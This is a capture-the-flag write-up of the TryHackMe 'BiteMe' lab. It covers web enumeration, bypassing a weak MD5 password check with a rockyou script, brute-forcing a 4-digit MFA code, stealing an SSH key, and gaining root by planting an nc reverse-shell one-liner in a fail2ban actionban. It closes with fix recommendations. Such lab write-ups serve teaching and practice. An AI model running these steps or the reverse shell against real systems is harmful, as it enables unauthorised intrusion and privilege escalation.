d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-biteme-thm/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

150 lines
4.1 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: "Writeup - BiteMe (THM)"
date: 2022-03-21
slug: "writeup-biteme-thm"
type: "writeup-ctf"
---
This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.10.31.162
```
Two TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.6p1)
- 80/tcp : HTTP web server (Apache 2.4.29)
## Exploit
First of all I start with a scan of the website pages.
![](img/image-2.webp)
Nothing special, let's try to do the same scan but with a focus on ".php" pages.
![](img/image-3.webp)
Ok, now there are a number of pages, including the "dashboard.php" page which gives us access to a login form.
![](img/image-4.webp)
The page "config.php" which gives us information about a connection identifier.
```bash
<?php
define('LOGIN_USER', '6a61736f6e5f746573745f6163636f756e74');
```
The function.php page that gives us the function that checks the password of the connection form.
```bash
<?php
include('config.php');
function is_valid_user($user) {
$user = bin2hex($user);
return $user === LOGIN_USER;
}
// @fred let's talk about ways to make this more secure but still flexible
function is_valid_pwd($pwd) {
$hash = md5($pwd);
return substr($hash, -3) === '001';
}
```
Now that we have all this information, we can start working. First of all with a hexa decoder we find the nickname "jason\_test\_account".
Then with the function we can create the following script to determine a working password:
```bash
<?php
$wordlist = fopen('wordlist/rockyou.txt', 'r');
while (($l = fgets($wordlist)) !== false) {
$hash = md5(trim($l));
if (substr($hash, -3) === '001') {
echo $l;
break;
}
}
fclose($wordlist);
```
![](img/image-5.webp)
We can now log in, but it is not finished. The page now asks us for an MFA code. Intercepting the server's response, we find the following in the source code.
![](img/image-6.webp)
This tells us that it is possible to brute force the MFA code, as no anti brute force function is in place. To realize the brute I create in a first time the dictionary of the possibilities with the following command:
```bash
crunch 4 4 0123456789 -o mfa
```
Then with Burp Intruder, I test all the possibilities!
I now have access to a page that allows me to see the contents of a folder, or the contents of a file.  So I want to get the id\_rsa of the user Jason to connect in SSH.
![](img/image-7.webp)
But we have a problem : the RSA key is encrypted with a password. To find the password, I use the following commands:
![](img/image-8.webp)
I can now connect in SSH with the user Jason and get the first flag.
```bash
chmod 600 id.jason
ssh -i id.jason jason@10.10.31.162
```
## Privilege escalation
For elevation of privilege, I start by checking the permissions with the "suso -l" command.
![](img/image-9.webp)
I observe that the user Fred has permissions to use the sudo command without a password. So I switch users to find out more.
![](img/image-10.webp)
It turns out that this user can use the command "sudo /bin/systemctl restart fail2ban" without password. This is interesting because in the fail2ban configuration files, you can define commands that will be executed in certain situations. Knowing that the fail2ban service is running with root rights, the commands will be executed as root!
So I go into the "iptables-multiport.conf" file to add commands to get a reverse shell :
```bash
actionban = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.67.218 1234 >/tmp/f
```
I then run the following command to restart fail2ban:
```bash
sudo systemctl restart fail2ban
```
I now have a root shell and I can get the last flag!
![](img/image-11.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Do not allow access to .phps pages
- Use a real password verification function
- Implement an anti-brute force function for the MFA page
- Don't let sudo be used without a password
Reference in New Issue View Git Blame Copy Permalink